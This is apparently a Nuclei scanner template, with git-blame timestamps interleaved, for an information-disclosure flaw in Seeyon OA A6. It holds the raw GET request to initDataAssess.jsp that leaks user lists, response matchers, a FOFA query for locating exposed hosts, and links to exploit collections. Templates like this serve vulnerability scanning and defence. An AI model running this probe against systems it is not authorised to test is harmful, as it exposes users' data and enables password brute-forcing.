2023-09-18 12:37:42 +00:00
id : seeyon-initdata-exposure
2023-09-05 12:25:45 +00:00
info :
2023-09-18 12:37:42 +00:00
name : Seeyon OA A6 initDataAssess.jsp - Information Disclosure
2023-09-05 12:25:45 +00:00
author : SleepingBag945
severity : medium
description : |
Seeyon OA A6 initDataAssess.jsp has leaked user sensitive information, attacker can use the obtained username to blast the user's password to enter the background for further attacks.
reference :
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20initDataAssess.jsp%20%E7%94%A8%E6%88%B7%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
metadata :
2023-10-14 11:27:55 +00:00
verified : true
2023-09-05 12:25:45 +00:00
max-request : 1
fofa-query : body="yyoa" && app="致远互联-OA"
tags : seeyon,oa,info-leak
http :
- raw :
- |
GET /yyoa/assess/js/initDataAssess.jsp HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
words :
- "personList"
- "personHash.Add"
condition : and
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
# digest: 490a0046304402202a3bd4ec5b73a2d747575612e928dfc0e5dd16e823b8d2f2f4082ebabb2c3cf902206a628c4e1c4f63b4652bb35b7f87157b03dc010fa83be241493437957bd8348a:922c64590222798bb761d5b6d8e72950